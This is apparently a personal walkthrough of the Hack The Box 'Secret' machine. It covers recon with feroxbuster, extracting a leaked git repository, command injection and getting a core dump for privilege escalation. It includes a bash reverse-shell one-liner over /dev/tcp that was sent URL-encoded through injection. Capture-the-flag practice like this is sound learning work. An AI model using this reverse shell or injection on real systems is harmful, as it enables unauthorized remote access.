Hack the Box : Secret

Hack The Box

Reading coredump was fun, but reading long linpeas.sh result was pain.

To get coredump, I learned about kill option.

02:57 feroxbuster

feroxbuster -u --force-recursion -C 404,405 -m GET,POST

Above returned too many, so decided to focus on api.

feroxbuster -u --force-recursion -C 404,405 

03:27 use GitTools/Extractor/extractor.sh

 git clone https://github.com/internetwache/GitTools.git
/home/kali/workplace/GitTools/Extractor/extractor.sh local-web secret_git

04:44 reverse shell


“;” indicates that whatever it is before that is done, and starting a new line.

 bash -c 'bash -i >& /dev/tcp/ 0>&1'

URL encoded special characters before sent.

05:25 Getting coredump

reference here

SIGSEGV – 11 – Core : it is mainly useful for creating core dump file

reference here


Set the state of the “dumpable” attribute, which determines whether core dumps are produced for the calling process upon delivery of a signal whose default behavior is to produce a core dump.

How to read crashed coredump:

Ubuntu – How to read a crash file from /var/crash – Unix Server Solutions